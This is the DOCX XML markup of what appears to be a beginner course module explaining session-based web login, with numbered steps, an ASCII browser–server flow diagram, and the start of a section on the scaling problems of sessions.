            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">🔑  User Sends Login Request</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">You type your username and password and click Login. This is sent as a POST request to the server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">🔍  Server Verifies Credentials</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The server looks up your username in the database. It checks: does the password match? If yes, proceed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">🎫  Server Creates a Session ID</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The server generates a unique random ID — e.g., "sess_x9k2m7kp". This is like a ticket number just for you.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">💾  Session Stored in Server Memory (RAM)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The server saves: "sess_x9k2m7kp → user ID 101, name Alice" — right in the server's RAM memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">🍪  Session ID Sent as a Cookie</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The Session ID (not your password!) is sent back to your browser as a cookie. Your browser stores it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">📤  Every Request Includes the Cookie</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">When you visit any page, your browser automatically sends the cookie. Server looks it up in memory → finds your session → grants access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">Session Flow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875A" w:sz="8"/>
              <w:left w:val="single" w:color="00875A" w:sz="8"/>
              <w:bottom w:val="single" w:color="00875A" w:sz="8"/>
              <w:right w:val="single" w:color="00875A" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:fill="08111E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="200"/>
              <w:left w:type="dxa" w:w="320"/>
              <w:bottom w:type="dxa" w:w="200"/>
              <w:right w:type="dxa" w:w="320"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  BROWSER (You)                              SERVER</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  ─────────────                              ──────</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  1. POST /login                 ─────────&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">     {username, password}                   Verify credentials</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                            Create: sess_x9k2 → user:101</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                            Store in RAM</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  2. 200 OK                      &lt;─────────</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">     Set-Cookie: sess_x9k2                  </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">     [Browser stores cookie]               </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                            </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  3. GET /dashboard              ─────────&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">     Cookie: sess_x9k2                      Look up sess_x9k2 in RAM</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                            Found! → user:101 → Alice</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  4. 200 OK (Alice's dashboard)  &lt;─────────</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                            </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  KEY POINT: Server must hold data in memory for EVERY logged-in user</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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The server stores the session in:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The browser stores the session ID in a:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">The Problems — Simulate Them in the App</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sessions work fine for small websites. But they have serious problems at scale. Let us prove it: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6CC" w:sz="4"/>
              <w:left w:val="single" w:color="0066CC" w:sz="24"/>
              <w:bottom w:val="single" w:color="0066CC" w:sz="4"/>
              <w:right w:val="single" w:color="0066CC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EAF4FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A3A6E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">👉  DO THIS IN THE APP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Stay on Module 02. Find the three red/yellow/blue buttons.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Click each button and read the message that appears.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Observe how the memory blocks change visually.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1800"/>
        <w:gridCol w:w="3560"/>
        <w:gridCol w:w="3800"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="555555" w:sz="4"/>
              <w:left w:val="single" w:color="555555" w:sz="4"/>
              <w:bottom w:val="single" w:color="555555" w:sz="4"/>
              <w:right w:val="single" w:color="555555" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="555555" w:sz="4"/>
              <w:left w:val="single" w:color="555555" w:sz="4"/>
              <w:bottom w:val="single" w:color="555555" w:sz="4"/>
              <w:right w:val="single" w:color="555555" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Problem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
